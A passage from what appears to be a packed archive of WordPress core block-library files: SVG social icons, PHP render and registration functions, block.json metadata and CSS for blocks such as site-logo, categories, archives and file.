c0,0.1,0.1,0.2,0.1,0.3s0,0.3,0,0.5c0,0.2,0,0.4,0,0.6c0,0.2,0,0.4,0,0.7c0,0.3,0,0.6,0,0.9c0,0.1,0,0.2,0,0.4c0,0.2,0,0.4,0,0.5 c0,0.1,0,0.3,0,0.4s0.1,0.3,0.1,0.4c0.1,0.1,0.1,0.2,0.2,0.3c0.1,0,0.1,0,0.2,0c0.1,0,0.2,0,0.3-0.1c0.1-0.1,0.2-0.2,0.4-0.4 s0.3-0.4,0.5-0.7c0.2-0.3,0.5-0.7,0.7-1.1c0.4-0.7,0.8-1.5,1.1-2.3c0-0.1,0.1-0.1,0.1-0.2c0-0.1,0.1-0.1,0.1-0.1l0,0l0.1,0 c0,0,0,0,0.1,0s0.2,0,0.2,0l3,0c0.3,0,0.5,0,0.7,0S21.9,7,21.9,7L22,7.1z"></path></svg>',
		),
		'wordpress'     => array(
			'name' => 'WordPress',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12.158,12.786L9.46,20.625c0.806,0.237,1.657,0.366,2.54,0.366c1.047,0,2.051-0.181,2.986-0.51 c-0.024-0.038-0.046-0.079-0.065-0.124L12.158,12.786z M3.009,12c0,3.559,2.068,6.634,5.067,8.092L3.788,8.341 C3.289,9.459,3.009,10.696,3.009,12z M18.069,11.546c0-1.112-0.399-1.881-0.741-2.48c-0.456-0.741-0.883-1.368-0.883-2.109 c0-0.826,0.627-1.596,1.51-1.596c0.04,0,0.078,0.005,0.116,0.007C16.472,3.904,14.34,3.009,12,3.009 c-3.141,0-5.904,1.612-7.512,4.052c0.211,0.007,0.41,0.011,0.579,0.011c0.94,0,2.396-0.114,2.396-0.114 C7.947,6.93,8.004,7.642,7.52,7.699c0,0-0.487,0.057-1.029,0.085l3.274,9.739l1.968-5.901l-1.401-3.838 C9.848,7.756,9.389,7.699,9.389,7.699C8.904,7.67,8.961,6.93,9.446,6.958c0,0,1.484,0.114,2.368,0.114 c0.94,0,2.397-0.114,2.397-0.114c0.485-0.028,0.542,0.684,0.057,0.741c0,0-0.488,0.057-1.029,0.085l3.249,9.665l0.897-2.996 C17.841,13.284,18.069,12.316,18.069,11.546z M19.889,7.686c0.039,0.286,0.06,0.593,0.06,0.924c0,0.912-0.171,1.938-0.684,3.22 l-2.746,7.94c2.673-1.558,4.47-4.454,4.47-7.771C20.991,10.436,20.591,8.967,19.889,7.686z M12,22C6.486,22,2,17.514,2,12 C2,6.486,6.486,2,12,2c5.514,0,10,4.486,10,10C22,17.514,17.514,22,12,22z"></path></svg>',
		),
		'whatsapp'      => array(
			'name' => 'WhatsApp',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M 12.011719 2 C 6.5057187 2 2.0234844 6.478375 2.0214844 11.984375 C 2.0204844 13.744375 2.4814687 15.462563 3.3554688 16.976562 L 2 22 L 7.2324219 20.763672 C 8.6914219 21.559672 10.333859 21.977516 12.005859 21.978516 L 12.009766 21.978516 C 17.514766 21.978516 21.995047 17.499141 21.998047 11.994141 C 22.000047 9.3251406 20.962172 6.8157344 19.076172 4.9277344 C 17.190172 3.0407344 14.683719 2.001 12.011719 2 z M 12.009766 4 C 14.145766 4.001 16.153109 4.8337969 17.662109 6.3417969 C 19.171109 7.8517969 20.000047 9.8581875 19.998047 11.992188 C 19.996047 16.396187 16.413812 19.978516 12.007812 19.978516 C 10.674812 19.977516 9.3544062 19.642812 8.1914062 19.007812 L 7.5175781 18.640625 L 6.7734375 18.816406 L 4.8046875 19.28125 L 5.2851562 17.496094 L 5.5019531 16.695312 L 5.0878906 15.976562 C 4.3898906 14.768562 4.0204844 13.387375 4.0214844 11.984375 C 4.0234844 7.582375 7.6067656 4 12.009766 4 z M 8.4765625 7.375 C 8.3095625 7.375 8.0395469 7.4375 7.8105469 7.6875 C 7.5815469 7.9365 6.9355469 8.5395781 6.9355469 9.7675781 C 6.9355469 10.995578 7.8300781 12.182609 7.9550781 12.349609 C 8.0790781 12.515609 9.68175 15.115234 12.21875 16.115234 C 14.32675 16.946234 14.754891 16.782234 15.212891 16.740234 C 15.670891 16.699234 16.690438 16.137687 16.898438 15.554688 C 17.106437 14.971687 17.106922 14.470187 17.044922 14.367188 C 16.982922 14.263188 16.816406 14.201172 16.566406 14.076172 C 16.317406 13.951172 15.090328 13.348625 14.861328 13.265625 C 14.632328 13.182625 14.464828 13.140625 14.298828 13.390625 C 14.132828 13.640625 13.655766 14.201187 13.509766 14.367188 C 13.363766 14.534188 13.21875 14.556641 12.96875 14.431641 C 12.71875 14.305641 11.914938 14.041406 10.960938 13.191406 C 10.218937 12.530406 9.7182656 11.714844 9.5722656 11.464844 C 9.4272656 11.215844 9.5585938 11.079078 9.6835938 10.955078 C 9.7955938 10.843078 9.9316406 10.663578 10.056641 10.517578 C 10.180641 10.371578 10.223641 10.267562 10.306641 10.101562 C 10.389641 9.9355625 10.347156 9.7890625 10.285156 9.6640625 C 10.223156 9.5390625 9.737625 8.3065 9.515625 7.8125 C 9.328625 7.3975 9.131125 7.3878594 8.953125 7.3808594 C 8.808125 7.3748594 8.6425625 7.375 8.4765625 7.375 z"></path></svg>',
		),
		'x'             => array(
			'name' => 'X',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M13.982 10.622 20.54 3h-1.554l-5.693 6.618L8.745 3H3.5l6.876 10.007L3.5 21h1.554l6.012-6.989L15.868 21h5.245l-7.131-10.378Zm-2.128 2.474-.697-.997-5.543-7.93H8l4.474 6.4.697.996 5.815 8.318h-2.387l-4.745-6.787Z" /></svg>',
		),
		'yelp'          => array(
			'name' => 'Yelp',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12.271,16.718v1.417q-.011,3.257-.067,3.4a.707.707,0,0,1-.569.446,4.637,4.637,0,0,1-2.024-.424A4.609,4.609,0,0,1,7.8,20.565a.844.844,0,0,1-.19-.4.692.692,0,0,1,.044-.29,3.181,3.181,0,0,1,.379-.524q.335-.412,2.019-2.409.011,0,.669-.781a.757.757,0,0,1,.44-.274.965.965,0,0,1,.552.039.945.945,0,0,1,.418.324.732.732,0,0,1,.139.468Zm-1.662-2.8a.783.783,0,0,1-.58.781l-1.339.435q-3.067.981-3.257.981a.711.711,0,0,1-.6-.4,2.636,2.636,0,0,1-.19-.836,9.134,9.134,0,0,1,.011-1.857,3.559,3.559,0,0,1,.335-1.389.659.659,0,0,1,.625-.357,22.629,22.629,0,0,1,2.253.859q.781.324,1.283.524l.937.379a.771.771,0,0,1,.4.34A.982.982,0,0,1,10.609,13.917Zm9.213,3.313a4.467,4.467,0,0,1-1.021,1.8,4.559,4.559,0,0,1-1.512,1.417.671.671,0,0,1-.7-.078q-.156-.112-2.052-3.2l-.524-.859a.761.761,0,0,1-.128-.513.957.957,0,0,1,.217-.513.774.774,0,0,1,.926-.29q.011.011,1.327.446,2.264.736,2.7.887a2.082,2.082,0,0,1,.524.229.673.673,0,0,1,.245.68Zm-7.5-7.049q.056,1.137-.6,1.361-.647.19-1.272-.792L6.237,4.08a.7.7,0,0,1,.212-.691,5.788,5.788,0,0,1,2.314-1,5.928,5.928,0,0,1,2.5-.352.681.681,0,0,1,.547.5q.034.2.245,3.407T12.327,10.181Zm7.384,1.2a.679.679,0,0,1-.29.658q-.167.112-3.67.959-.747.167-1.015.257l.011-.022a.769.769,0,0,1-.513-.044.914.914,0,0,1-.413-.357.786.786,0,0,1,0-.971q.011-.011.836-1.137,1.394-1.908,1.673-2.275a2.423,2.423,0,0,1,.379-.435A.7.7,0,0,1,17.435,8a4.482,4.482,0,0,1,1.372,1.489,4.81,4.81,0,0,1,.9,1.868v.034Z"></path></svg>',
		),
		'youtube'       => array(
			'name' => 'YouTube',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M21.8,8.001c0,0-0.195-1.378-0.795-1.985c-0.76-0.797-1.613-0.801-2.004-0.847c-2.799-0.202-6.997-0.202-6.997-0.202 h-0.009c0,0-4.198,0-6.997,0.202C4.608,5.216,3.756,5.22,2.995,6.016C2.395,6.623,2.2,8.001,2.2,8.001S2,9.62,2,11.238v1.517 c0,1.618,0.2,3.237,0.2,3.237s0.195,1.378,0.795,1.985c0.761,0.797,1.76,0.771,2.205,0.855c1.6,0.153,6.8,0.201,6.8,0.201 s4.203-0.006,7.001-0.209c0.391-0.047,1.243-0.051,2.004-0.847c0.6-0.607,0.795-1.985,0.795-1.985s0.2-1.618,0.2-3.237v-1.517 C22,9.62,21.8,8.001,21.8,8.001z M9.935,14.594l-0.001-5.62l5.404,2.82L9.935,14.594z"></path></svg>',
		),
	);

	if ( ! empty( $service )
		&& ! empty( $field )
		&& isset( $services_data[ $service ] )
		&& ( 'icon' === $field || 'name' === $field )
	) {
		return $services_data[ $service ][ $field ];
	} elseif ( ! empty( $service ) && isset( $services_data[ $service ] ) ) {
		return $services_data[ $service ];
	}

	return $services_data;
}

/**
 * Returns CSS styles for icon and icon background colors.
 *
 * @since 5.7.0
 *
 * @param array $context Block context passed to Social Link.
 *
 * @return string Inline CSS styles for link's icon and background colors.
 */
function block_core_social_link_get_color_styles( $context ) {
	$styles = array();

	if ( array_key_exists( 'iconColorValue', $context ) ) {
		$styles[] = 'color: ' . $context['iconColorValue'] . '; ';
	}

	if ( array_key_exists( 'iconBackgroundColorValue', $context ) ) {
		$styles[] = 'background-color: ' . $context['iconBackgroundColorValue'] . '; ';
	}

	return implode( '', $styles );
}

/**
 * Returns CSS classes for icon and icon background colors.
 *
 * @since 6.3.0
 *
 * @param array $context Block context passed to Social Sharing Link.
 *
 * @return string CSS classes for link's icon and background colors.
 */
function block_core_social_link_get_color_classes( $context ) {
	$classes = array();

	if ( array_key_exists( 'iconColor', $context ) ) {
		$classes[] = 'has-' . $context['iconColor'] . '-color';
	}

	if ( array_key_exists( 'iconBackgroundColor', $context ) ) {
		$classes[] = 'has-' . $context['iconBackgroundColor'] . '-background-color';
	}

	return ' ' . implode( ' ', $classes );
}
post-title/style.css000060400000000173151330427370010524 0ustar00.wp-block-post-title{
  box-sizing:border-box;
  word-break:break-word;
}
.wp-block-post-title a{
  display:inline-block;
}post-title/style-rtl.css000060400000000173151330427370011323 0ustar00.wp-block-post-title{
  box-sizing:border-box;
  word-break:break-word;
}
.wp-block-post-title a{
  display:inline-block;
}post-title/block.json000060400000002517151330427370010643 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-title",
	"title": "Title",
	"category": "theme",
	"description": "Displays the title of a post, page, or any other content-type.",
	"textdomain": "default",
	"usesContext": [ "postId", "postType", "queryId" ],
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"level": {
			"type": "number",
			"default": 2
		},
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"rel": {
			"type": "string",
			"attribute": "rel",
			"default": ""
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-post-title"
}
post-title/style.min.css000060400000000155151330427370011306 0ustar00.wp-block-post-title{box-sizing:border-box;word-break:break-word}.wp-block-post-title a{display:inline-block}post-title/style-rtl.min.css000060400000000155151330427370012105 0ustar00.wp-block-post-title{box-sizing:border-box;word-break:break-word}.wp-block-post-title a{display:inline-block}home-link/block.json000060400000002152151330427370010415 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/home-link",
	"category": "design",
	"parent": [ "core/navigation" ],
	"title": "Home Link",
	"description": "Create a link that always points to the homepage of the site. Usually not necessary if there is already a site title link present in the header.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		}
	},
	"usesContext": [
		"textColor",
		"customTextColor",
		"backgroundColor",
		"customBackgroundColor",
		"fontSize",
		"customFontSize",
		"style"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-home-link-editor",
	"style": "wp-block-home-link"
}
html/editor.min.css000060400000001375151330427370010301 0ustar00.block-library-html__edit .block-library-html__preview-overlay{height:100%;left:0;position:absolute;top:0;width:100%}.block-library-html__edit .block-editor-plain-text{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;direction:ltr;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important}@media (min-width:600px){.block-library-html__edit .block-editor-plain-text{font-size:13px!important}}.block-library-html__edit .block-editor-plain-text:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}html/editor.css000060400000001530151330427370007510 0ustar00.block-library-html__edit .block-library-html__preview-overlay{
  height:100%;
  left:0;
  position:absolute;
  top:0;
  width:100%;
}
.block-library-html__edit .block-editor-plain-text{
  background:#fff !important;
  border:1px solid #1e1e1e !important;
  border-radius:2px !important;
  box-shadow:none !important;
  box-sizing:border-box;
  color:#1e1e1e !important;
  direction:ltr;
  font-family:Menlo,Consolas,monaco,monospace !important;
  font-size:16px !important;
  max-height:250px;
  padding:12px !important;
}
@media (min-width:600px){
  .block-library-html__edit .block-editor-plain-text{
    font-size:13px !important;
  }
}
.block-library-html__edit .block-editor-plain-text:focus{
  border-color:var(--wp-admin-theme-color) !important;
  box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important;
  outline:2px solid #0000 !important;
}html/editor-rtl.min.css000060400000001376151330427370011101 0ustar00.block-library-html__edit .block-library-html__preview-overlay{height:100%;position:absolute;right:0;top:0;width:100%}.block-library-html__edit .block-editor-plain-text{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;direction:ltr;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important}@media (min-width:600px){.block-library-html__edit .block-editor-plain-text{font-size:13px!important}}.block-library-html__edit .block-editor-plain-text:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}html/block.json000060400000001016151330427370007474 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/html",
	"title": "Custom HTML",
	"category": "widgets",
	"description": "Add custom HTML code and preview it as you edit.",
	"keywords": [ "embed" ],
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "string",
			"source": "raw"
		}
	},
	"supports": {
		"customClassName": false,
		"className": false,
		"html": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-html-editor"
}
html/editor-rtl.css000060400000001531151330427370010310 0ustar00.block-library-html__edit .block-library-html__preview-overlay{
  height:100%;
  position:absolute;
  right:0;
  top:0;
  width:100%;
}
.block-library-html__edit .block-editor-plain-text{
  background:#fff !important;
  border:1px solid #1e1e1e !important;
  border-radius:2px !important;
  box-shadow:none !important;
  box-sizing:border-box;
  color:#1e1e1e !important;
  direction:ltr;
  font-family:Menlo,Consolas,monaco,monospace !important;
  font-size:16px !important;
  max-height:250px;
  padding:12px !important;
}
@media (min-width:600px){
  .block-library-html__edit .block-editor-plain-text{
    font-size:13px !important;
  }
}
.block-library-html__edit .block-editor-plain-text:focus{
  border-color:var(--wp-admin-theme-color) !important;
  box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important;
  outline:2px solid #0000 !important;
}site-logo.php000060400000014061151330427370007162 0ustar00<?php
/**
 * Server-side rendering of the `core/site-logo` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/site-logo` block on the server.
 *
 * @since 5.8.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The render.
 */
function render_block_core_site_logo( $attributes ) {
	$adjust_width_height_filter = static function ( $image ) use ( $attributes ) {
		if ( empty( $attributes['width'] ) || empty( $image ) || ! $image[1] || ! $image[2] ) {
			return $image;
		}
		$height = (float) $attributes['width'] / ( (float) $image[1] / (float) $image[2] );
		return array( $image[0], (int) $attributes['width'], (int) $height );
	};

	add_filter( 'wp_get_attachment_image_src', $adjust_width_height_filter );

	$custom_logo = get_custom_logo();

	remove_filter( 'wp_get_attachment_image_src', $adjust_width_height_filter );

	if ( empty( $custom_logo ) ) {
		return ''; // Return early if no custom logo is set, avoiding extraneous wrapper div.
	}

	if ( ! $attributes['isLink'] ) {
		// Remove the link.
		$custom_logo = preg_replace( '#<a.*?>(.*?)</a>#i', '\1', $custom_logo );
	}

	if ( $attributes['isLink'] && '_blank' === $attributes['linkTarget'] ) {
		// Add the link target after the rel="home".
		// Add an aria-label for informing that the page opens in a new tab.
		$processor = new WP_HTML_Tag_Processor( $custom_logo );
		$processor->next_tag( 'a' );
		if ( 'home' === $processor->get_attribute( 'rel' ) ) {
			$processor->set_attribute( 'aria-label', __( '(Home link, opens in a new tab)' ) );
			$processor->set_attribute( 'target', $attributes['linkTarget'] );
		}
		$custom_logo = $processor->get_updated_html();
	}

	$classnames = array();
	if ( empty( $attributes['width'] ) ) {
		$classnames[] = 'is-default-size';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) );
	$html               = sprintf( '<div %s>%s</div>', $wrapper_attributes, $custom_logo );
	return $html;
}

/**
 * Register a core site setting for a site logo
 *
 * @since 5.8.0
 */
function register_block_core_site_logo_setting() {
	register_setting(
		'general',
		'site_logo',
		array(
			'show_in_rest' => array(
				'name' => 'site_logo',
			),
			'type'         => 'integer',
			'label'        => __( 'Logo' ),
			'description'  => __( 'Site logo.' ),
		)
	);
}

add_action( 'rest_api_init', 'register_block_core_site_logo_setting', 10 );

/**
 * Register a core site setting for a site icon
 *
 * @since 5.9.0
 */
function register_block_core_site_icon_setting() {
	register_setting(
		'general',
		'site_icon',
		array(
			'show_in_rest' => true,
			'type'         => 'integer',
			'label'        => __( 'Icon' ),
			'description'  => __( 'Site icon.' ),
		)
	);
}

add_action( 'rest_api_init', 'register_block_core_site_icon_setting', 10 );

/**
 * Registers the `core/site-logo` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_site_logo() {
	register_block_type_from_metadata(
		__DIR__ . '/site-logo',
		array(
			'render_callback' => 'render_block_core_site_logo',
		)
	);
}

add_action( 'init', 'register_block_core_site_logo' );

/**
 * Overrides the custom logo with a site logo, if the option is set.
 *
 * @since 5.8.0
 *
 * @param string $custom_logo The custom logo set by a theme.
 *
 * @return string The site logo if set.
 */
function _override_custom_logo_theme_mod( $custom_logo ) {
	$site_logo = get_option( 'site_logo' );
	return false === $site_logo ? $custom_logo : $site_logo;
}

add_filter( 'theme_mod_custom_logo', '_override_custom_logo_theme_mod' );

/**
 * Updates the site_logo option when the custom_logo theme-mod gets updated.
 *
 * @since 5.8.0
 *
 * @param  mixed $value Attachment ID of the custom logo or an empty value.
 * @return mixed
 */
function _sync_custom_logo_to_site_logo( $value ) {
	if ( empty( $value ) ) {
		delete_option( 'site_logo' );
	} else {
		update_option( 'site_logo', $value );
	}

	return $value;
}

add_filter( 'pre_set_theme_mod_custom_logo', '_sync_custom_logo_to_site_logo' );

/**
 * Deletes the site_logo when the custom_logo theme mod is removed.
 *
 * @since 5.8.0
 *
 * @param array $old_value Previous theme mod settings.
 * @param array $value     Updated theme mod settings.
 */
function _delete_site_logo_on_remove_custom_logo( $old_value, $value ) {
	global $_ignore_site_logo_changes;

	if ( $_ignore_site_logo_changes ) {
		return;
	}

	// If the custom_logo is being unset, it's being removed from theme mods.
	if ( isset( $old_value['custom_logo'] ) && ! isset( $value['custom_logo'] ) ) {
		delete_option( 'site_logo' );
	}
}

/**
 * Deletes the site logo when all theme mods are being removed.
 *
 * @since 5.8.0
 */
function _delete_site_logo_on_remove_theme_mods() {
	global $_ignore_site_logo_changes;

	if ( $_ignore_site_logo_changes ) {
		return;
	}

	if ( false !== get_theme_support( 'custom-logo' ) ) {
		delete_option( 'site_logo' );
	}
}

/**
 * Hooks `_delete_site_logo_on_remove_custom_logo` in `update_option_theme_mods_$theme`.
 * Hooks `_delete_site_logo_on_remove_theme_mods` in `delete_option_theme_mods_$theme`.
 *
 * Runs on `setup_theme` to account for dynamically-switched themes in the Customizer.
 *
 * @since 5.8.0
 */
function _delete_site_logo_on_remove_custom_logo_on_setup_theme() {
	$theme = get_option( 'stylesheet' );
	add_action( "update_option_theme_mods_$theme", '_delete_site_logo_on_remove_custom_logo', 10, 2 );
	add_action( "delete_option_theme_mods_$theme", '_delete_site_logo_on_remove_theme_mods' );
}
add_action( 'setup_theme', '_delete_site_logo_on_remove_custom_logo_on_setup_theme', 11 );

/**
 * Removes the custom_logo theme-mod when the site_logo option gets deleted.
 *
 * @since 5.9.0
 */
function _delete_custom_logo_on_remove_site_logo() {
	global $_ignore_site_logo_changes;

	// Prevent _delete_site_logo_on_remove_custom_logo and
	// _delete_site_logo_on_remove_theme_mods from firing and causing an
	// infinite loop.
	$_ignore_site_logo_changes = true;

	// Remove the custom logo.
	remove_theme_mod( 'custom_logo' );

	$_ignore_site_logo_changes = false;
}
add_action( 'delete_option_site_logo', '_delete_custom_logo_on_remove_site_logo' );
categories/style-rtl.css000060400000000362151330427370011344 0ustar00.wp-block-categories{
  box-sizing:border-box;
}
.wp-block-categories.alignleft{
  margin-right:2em;
}
.wp-block-categories.alignright{
  margin-left:2em;
}
.wp-block-categories.wp-block-categories-dropdown.aligncenter{
  text-align:center;
}categories/editor-rtl.css000060400000000242151330427370011467 0ustar00.wp-block-categories ul{
  padding-right:2.5em;
}
.wp-block-categories ul ul{
  margin-top:6px;
}
[data-align=center] .wp-block-categories{
  text-align:center;
}categories/editor.css000060400000000241151330427370010667 0ustar00.wp-block-categories ul{
  padding-left:2.5em;
}
.wp-block-categories ul ul{
  margin-top:6px;
}
[data-align=center] .wp-block-categories{
  text-align:center;
}categories/style.css000060400000000362151330427370010545 0ustar00.wp-block-categories{
  box-sizing:border-box;
}
.wp-block-categories.alignleft{
  margin-right:2em;
}
.wp-block-categories.alignright{
  margin-left:2em;
}
.wp-block-categories.wp-block-categories-dropdown.aligncenter{
  text-align:center;
}categories/editor.min.css000060400000000220151330427370011446 0ustar00.wp-block-categories ul{padding-left:2.5em}.wp-block-categories ul ul{margin-top:6px}[data-align=center] .wp-block-categories{text-align:center}categories/style.min.css000060400000000333151330427370011325 0ustar00.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}categories/block.json000060400000002413151330427370010657 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/categories",
	"title": "Categories List",
	"category": "widgets",
	"description": "Display a list of all categories.",
	"textdomain": "default",
	"attributes": {
		"displayAsDropdown": {
			"type": "boolean",
			"default": false
		},
		"showHierarchy": {
			"type": "boolean",
			"default": false
		},
		"showPostCounts": {
			"type": "boolean",
			"default": false
		},
		"showOnlyTopLevel": {
			"type": "boolean",
			"default": false
		},
		"showEmpty": {
			"type": "boolean",
			"default": false
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-categories-editor",
	"style": "wp-block-categories"
}
categories/editor-rtl.min.css000060400000000221151330427370012246 0ustar00.wp-block-categories ul{padding-right:2.5em}.wp-block-categories ul ul{margin-top:6px}[data-align=center] .wp-block-categories{text-align:center}categories/style-rtl.min.css000060400000000333151330427370012124 0ustar00.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}archives/editor.css000060400000000055151330427370010351 0ustar00ul.wp-block-archives{
  padding-left:2.5em;
}archives/style-rtl.css000060400000000145151330427370011022 0ustar00.wp-block-archives{
  box-sizing:border-box;
}

.wp-block-archives-dropdown label{
  display:block;
}archives/editor.min.css000060400000000050151330427370011126 0ustar00ul.wp-block-archives{padding-left:2.5em}archives/style.css000060400000000145151330427370010223 0ustar00.wp-block-archives{
  box-sizing:border-box;
}

.wp-block-archives-dropdown label{
  display:block;
}archives/style-rtl.min.css000060400000000131151330427370011577 0ustar00.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}archives/editor-rtl.css000060400000000056151330427370011151 0ustar00ul.wp-block-archives{
  padding-right:2.5em;
}archives/style.min.css000060400000000131151330427370011000 0ustar00.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}archives/block.json000060400000002225151330427370010337 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/archives",
	"title": "Archives",
	"category": "widgets",
	"description": "Display a date archive of your posts.",
	"textdomain": "default",
	"attributes": {
		"displayAsDropdown": {
			"type": "boolean",
			"default": false
		},
		"showLabel": {
			"type": "boolean",
			"default": true
		},
		"showPostCounts": {
			"type": "boolean",
			"default": false
		},
		"type": {
			"type": "string",
			"default": "monthly"
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-archives-editor"
}
archives/editor-rtl.min.css000060400000000051151330427370011726 0ustar00ul.wp-block-archives{padding-right:2.5em}comments-pagination-previous.php000060400000003224151330427370013105 0ustar00<?php
/**
 * Server-side rendering of the `core/comments-pagination-previous` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-pagination-previous` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the previous posts link for the comments pagination.
 */
function render_block_core_comments_pagination_previous( $attributes, $content, $block ) {
	$default_label    = __( 'Older Comments' );
	$label            = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? $attributes['label'] : $default_label;
	$pagination_arrow = get_comments_pagination_arrow( $block, 'previous' );
	if ( $pagination_arrow ) {
		$label = $pagination_arrow . $label;
	}

	$filter_link_attributes = static function () {
		return get_block_wrapper_attributes();
	};
	add_filter( 'previous_comments_link_attributes', $filter_link_attributes );

	$previous_comments_link = get_previous_comments_link( $label );

	remove_filter( 'previous_comments_link_attributes', $filter_link_attributes );

	if ( ! isset( $previous_comments_link ) ) {
		return '';
	}

	return $previous_comments_link;
}

/**
 * Registers the `core/comments-pagination-previous` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comments_pagination_previous() {
	register_block_type_from_metadata(
		__DIR__ . '/comments-pagination-previous',
		array(
			'render_callback' => 'render_block_core_comments_pagination_previous',
		)
	);
}
add_action( 'init', 'register_block_core_comments_pagination_previous' );
file.php000060400000004307151330427370006201 0ustar00<?php
/**
 * Server-side rendering of the `core/file` block.
 *
 * @package WordPress
 */

/**
 * When the `core/file` block is rendering, check if we need to enqueue the `wp-block-file-view` script.
 *
 * @since 5.8.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The block content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the block content.
 */
function render_block_core_file( $attributes, $content ) {
	// If it's interactive, enqueue the script module and add the directives.
	if ( ! empty( $attributes['displayPreview'] ) ) {
		$suffix = wp_scripts_get_suffix();
		if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
			$module_url = gutenberg_url( '/build/interactivity/file.min.js' );
		}

		wp_register_script_module(
			'@wordpress/block-library/file',
			isset( $module_url ) ? $module_url : includes_url( "blocks/file/view{$suffix}.js" ),
